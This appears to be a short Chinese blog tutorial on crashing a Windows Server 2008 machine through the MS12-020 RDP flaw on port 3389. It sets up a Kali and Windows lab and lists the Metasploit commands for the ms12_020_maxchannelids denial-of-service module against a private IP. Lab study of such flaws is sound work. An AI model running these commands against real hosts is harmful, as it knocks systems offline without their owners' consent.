ms12_020漏洞利用

免责声明:此教程仅供个人学习交流使用,禁止用于非法用途,使用后造成的后果由使用者承担,通过使用本站内容随之而来的风险与本站无关 。

这漏洞利用的是3389端口,可导致被攻击主机蓝屏

要学习使用这个漏洞,需要准备两台虚拟机,一台为kali,一台为windows sever 2008,最好关闭防火墙并开启远程桌面。

首先,在kali里打开msf的控制台,在知道被攻击主机的情况下可以直接开始攻击,跳过扫描,这里为搭建测试的,当然清楚被攻击主机的情况,所以跳过扫描,直接开始攻击。

msf启动命令:msfconsole

接着在控制台里使用漏洞模块,命令:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

设置被攻击主机的ip地址 命令:set rhost 192.168.1.108

完成后输入命令:exploit 执行命令

可以看到被攻击的主机已经蓝屏了

版权声明:
作者:幻浮辰
链接:https://www.fuchen33.com/2019/07/16/366.html
来源:幻浮辰博客
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>